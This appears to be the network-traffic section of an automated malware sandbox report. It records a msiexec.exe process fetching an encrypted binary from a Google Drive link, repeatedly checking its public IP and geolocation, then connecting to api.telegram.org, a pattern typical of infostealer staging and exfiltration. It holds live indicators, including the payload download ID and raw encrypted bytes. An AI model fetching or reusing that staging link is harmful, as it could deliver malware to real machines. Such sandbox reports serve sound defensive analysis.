Oct 21, 2024 11:57:16.726705074 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:16.726773024 CEST	54191	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:16.727024078 CEST	54191	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:16.727037907 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:16.775984049 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:17.918740034 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:17.920264006 CEST	54191	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:17.920296907 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:18.079529047 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:18.079603910 CEST	443	54191	188.114.97.3	192.168.2.4
Oct 21, 2024 11:57:18.079655886 CEST	54191	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:18.080075979 CEST	54191	443	192.168.2.4	188.114.97.3
Oct 21, 2024 11:57:18.106524944 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:18.115660906 CEST	80	54187	158.101.44.242	192.168.2.4
Oct 21, 2024 11:57:18.115729094 CEST	54187	80	192.168.2.4	158.101.44.242
Oct 21, 2024 11:57:18.117850065 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:18.117896080 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:18.117954969 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:18.118304014 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:18.118315935 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:18.968580008 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:18.968668938 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:18.970181942 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:18.970189095 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:18.970387936 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:18.971857071 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:19.019442081 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:19.211369991 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:19.211430073 CEST	443	54194	149.154.167.220	192.168.2.4
Oct 21, 2024 11:57:19.211519957 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:19.213665009 CEST	54194	443	192.168.2.4	149.154.167.220
Oct 21, 2024 11:57:24.998670101 CEST	54126	80	192.168.2.4	158.101.44.242

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 21, 2024 11:56:12.205771923 CEST	53	57090	1.1.1.1	192.168.2.4
Oct 21, 2024 11:56:58.312228918 CEST	55593	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:56:58.319118023 CEST	53	55593	1.1.1.1	192.168.2.4
Oct 21, 2024 11:56:59.648366928 CEST	50621	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:56:59.656712055 CEST	53	50621	1.1.1.1	192.168.2.4
Oct 21, 2024 11:57:04.343434095 CEST	61219	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:57:04.350883007 CEST	53	61219	1.1.1.1	192.168.2.4
Oct 21, 2024 11:57:05.680850983 CEST	53200	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:57:05.688487053 CEST	53	53200	1.1.1.1	192.168.2.4
Oct 21, 2024 11:57:18.107147932 CEST	62368	53	192.168.2.4	1.1.1.1
Oct 21, 2024 11:57:18.117299080 CEST	53	62368	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 21, 2024 11:56:58.312228918 CEST	192.168.2.4	1.1.1.1	0xed41	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:56:59.648366928 CEST	192.168.2.4	1.1.1.1	0xd2e0	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.343434095 CEST	192.168.2.4	1.1.1.1	0xf3d2	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:05.680850983 CEST	192.168.2.4	1.1.1.1	0x87fa	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:18.107147932 CEST	192.168.2.4	1.1.1.1	0x1170	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 21, 2024 11:56:58.319118023 CEST	1.1.1.1	192.168.2.4	0xed41	No error (0)	drive.google.com		142.250.186.174	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:56:59.656712055 CEST	1.1.1.1	192.168.2.4	0xd2e0	No error (0)	drive.usercontent.google.com		142.250.184.225	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:04.350883007 CEST	1.1.1.1	192.168.2.4	0xf3d2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:05.688487053 CEST	1.1.1.1	192.168.2.4	0x87fa	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:05.688487053 CEST	1.1.1.1	192.168.2.4	0x87fa	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 21, 2024 11:57:18.117299080 CEST	1.1.1.1	192.168.2.4	0x1170	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	54107	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:04.359499931 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:04.998887062 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:04 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d06cafeb5013c174da748289d7497821 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:57:05.002331018 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:57:05.377093077 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:05 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2196e7e611d699f27c2d6cccaa2d0cd8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>
Oct 21, 2024 11:57:06.460771084 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:57:06.608454943 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:06 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b1c596b5671682ccc605d55914454a2a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	54126	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:07.369353056 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Oct 21, 2024 11:57:08.007764101 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:07 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: adae222ed1f76b0e32871a2db8fbe819 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	54136	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:08.762512922 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:09.394260883 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:09 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 592d8b23ffea1a26a79956909e1b6036 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	54145	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:10.138943911 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:10.795423985 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:10 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4da86b8a93be219683b8b5fc81b99a7b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	54155	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:11.559163094 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:12.199179888 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:12 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4d5e0d624b71e12e31094e2713905395 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	54166	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:13.168103933 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:13.818181038 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:13 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 66170edc2b199aae50236841ce39f8cb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	54176	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:14.666161060 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:15.311129093 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:15 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 517b928c7cd85cd8f925062fd99270b2 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	54187	158.101.44.242	80	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Oct 21, 2024 11:57:16.084129095 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Oct 21, 2024 11:57:16.724349976 CEST	323	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:16 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 745ca06dcbee6db6b297f60ba8d55d90 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.186</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	54072	142.250.186.174	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:56:59 UTC	216	OUT	GET /uc?export=download&id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs- HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-10-21 09:56:59 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 21 Oct 2024 09:56:59 GMT Location: https://drive.usercontent.google.com/download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'nonce-FmvYRgpk8C26uYNOO30yaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	54083	142.250.184.225	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:00 UTC	258	OUT	GET /download?id=13KKtndCYeXLcUP9nCtdZDwnEAIEerzs-&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-10-21 09:57:03 UTC	4900	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="XisYyerVhOrZZ229.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 275520 Last-Modified: Mon, 21 Oct 2024 00:22:41 GMT X-GUploader-UploadID: AHmUCY1TeXm0EWyz_tHg7HHEpJkjguvuQd18NAH7GI118lq3Po1TUopb2r7jv6eqQxH-XFuBCDNkCkDhXQ Date: Mon, 21 Oct 2024 09:57:03 GMT Expires: Mon, 21 Oct 2024 09:57:03 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=sfvM8A== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-21 09:57:03 UTC	4900	IN	Data Raw: 5b 43 b9 20 f7 7b a1 78 2c 76 ff 99 96 17 5e 37 48 87 bd cf a8 24 24 77 c0 6f 9e f4 89 6b 9e a5 7d 6a f3 6d 94 a4 b8 a5 cc c8 41 a1 5e d6 d1 09 df 41 88 fd ad 97 16 73 cc 72 6f 7e 51 42 d8 bf da 57 e6 83 76 b5 15 08 f0 22 53 ff 74 9a 6d 88 c9 e7 da f6 57 f8 98 ea 1f 5b 6d 85 27 cf b0 93 74 ba b0 b6 29 49 30 f5 a6 cd 14 ce 89 f0 f2 0e 99 d0 5d f2 91 31 81 83 92 b1 4f 17 e5 37 fd 0c bd 73 74 17 5b fa c9 b0 fa c8 83 93 12 c5 ed c9 f0 77 d8 df 91 d9 7f 6f 80 42 79 66 10 04 b4 af 16 98 3a f2 85 af 3e 42 8e 13 ff a4 15 47 c4 45 86 bb 27 60 71 84 53 e1 91 14 fd db 64 50 57 23 35 ab 8b db f5 df ce 94 d3 eb a8 75 b9 7f 8d 19 ab 48 00 8c 49 72 e2 02 ab f1 f7 83 37 a3 64 d6 c5 51 e5 04 ad 61 ea 73 93 73 85 ab 29 dc d6 16 12 3f 9c 13 93 be e1 b9 08 81 ad 7a af ad 2b Data Ascii: [C {x,v^7H$$wok}jmA^Asro~QBWv"StmW[m't)I0]1O7st[woByf:>BGE'`qSdPW#5uHIr7dQass)?z+
2024-10-21 09:57:03 UTC	4898	IN	Data Raw: 5b fe 42 da 92 65 55 8d 26 f2 0b 82 e5 01 e4 20 82 07 e7 bb 57 69 18 fa ef a8 10 bf ac 5c 5e dd 2a 7e cd a3 53 eb 58 94 68 74 47 ba 77 fb dd 75 77 92 76 a8 27 77 5d cb ae 13 f2 90 08 8c 1c a9 15 dd fd d2 77 d0 d3 f5 a8 31 77 cf ba c2 07 47 dd d5 be 10 3a f5 bd 46 bb 64 18 bd 2c 56 af 6f ea fa be a1 40 69 12 3a 1f bc b0 36 8c b2 6a 65 61 4b f4 fa 0b 7d 2d c5 4f 72 e6 62 20 3a a7 da 84 0b 76 56 24 b5 40 fb df f3 ac aa c6 ed ff 4f 90 5d 2b c8 bd 3c d8 90 92 50 66 bd d3 a9 6a 7b bb 2d e7 32 f7 2f 0e d6 13 45 48 40 e7 ac a3 1f 30 3c a1 d0 08 19 6c ea 6d 06 bb 04 6d 9f 60 74 c0 7e 2a 43 23 51 f9 c1 17 59 8f d7 eb 6c 54 82 d8 8b 18 df d6 bb a3 39 ef 07 ab 5f a4 1a d8 09 a2 db 00 e0 7f 91 dc 3c b0 ef 26 2c df 9a 27 e4 e1 01 2b 73 21 6b 36 e5 af c9 5f fc 58 92 25 Data Ascii: [BeU& Wi\^~SXhtGwuwv'w]w1wG:Fd,Vo@i:6jeaK}-Orb :vV$@O]+<Pfj{-2/EH@0<lmm`t~C#QYlT9_<&,'+s!k6_X%
2024-10-21 09:57:03 UTC	1323	IN	Data Raw: 0b 0c c7 ab 84 6c 4e 6f fe c8 92 ae 48 1f f1 7b 84 72 b4 11 28 1c 4f 6e ff 7f 3e 1f 53 fa 6b 78 ac fb a0 a2 d4 0e b5 e5 d1 39 af 2b ca 96 5c 10 2c aa 0d 76 85 06 75 15 08 fe 0a 92 ff 8b 6f 6d fb b3 e7 da fc 44 f0 89 e2 21 61 6d 85 23 bc 73 93 74 b0 df 72 29 49 3a f5 b7 c5 7b 0b 89 f0 f8 70 a4 d0 5d f6 fe f7 81 83 98 b1 5e 1f 17 bd ed 0c c3 44 7a 19 5b 44 b2 dd cb 70 f2 f7 84 e4 b9 ab f6 c3 f8 af e9 b6 09 15 fc a2 19 05 71 6b ff d6 10 dc 57 97 d5 7f 6e 3b 86 ce 91 84 5b aa b2 7d 99 aa 4c 05 2f 2b 7b f2 cb 2c fd db 60 f2 72 39 17 4c 84 db c9 7c e8 8f 74 44 38 13 bd dd a8 05 d9 f8 0f 8c d9 d0 c8 76 a0 f0 ad ec ff bd 60 dc c5 3b d9 04 ad 65 99 ba 9d 4f 8b b8 20 82 e7 16 12 7b ea 44 91 be d1 af 20 20 ad 7a a5 b9 d5 ec 8e b3 87 59 30 51 b8 9f 4d 41 be 4e 9f 55 Data Ascii: lNoH{r(On>Skx9+\,vuomD!am#str)I:{p]^Dz[DpqkWn;[}L/+{,`r9L\|tD8v`;eO {D zY0QMANU
